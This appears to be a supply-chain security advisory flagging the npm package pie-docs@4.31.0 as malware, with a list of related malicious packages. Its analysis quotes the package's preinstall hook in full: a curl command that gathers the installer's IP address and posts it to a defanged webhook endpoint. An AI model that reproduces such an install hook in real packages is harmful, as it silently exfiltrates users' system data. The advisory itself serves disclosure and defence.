LWA-2026-4570 confirmed malware
pie-docs@4.31.0
Malicious code in pie-docs (npm)
T1059.004 · Unix ShellT1082 · System Information DiscoveryT1041 · Exfiltration Over C2 Channel
Analysis
A metadata-only attack package masquerading as a documentation module: the tarball is only 372 bytes and ships nothing but a package.json with a malicious preinstall hook. On install the hook runs `/usr/bin/curl --data "ip=$(sh -c 'hostname -I')" hxxps://webhook-test[.]com/0c3ba7837882ab803c265c52e2dd8cea`, collecting the installer's local IP address and exfiltrating it via HTTP POST to a collector endpoint.
- analyzed by
- Leitwacht
- first seen
- Jun 12, 2026, 07:38 AM
- analyzed
- Jun 12, 2026, 07:40 AM
Related advisories
- openclaw-preview@2026.6.1
- internallib_v856@99.0.0
- chalk-plus-ts@1.0.3
- ecto-rust-read-f3a9c1@1.0.2
- noon-contracts@1.0.0
- node-env-resolver-vite@2.4.2
- pocteszep@1.0.0
- mypocmaliciouspackage-cursorpt1@4.0.0
Independently detected by the Leitwacht supply-chain probe. IOCs are defanged. Published CC0. Think this is a mistake? See the dispute policy.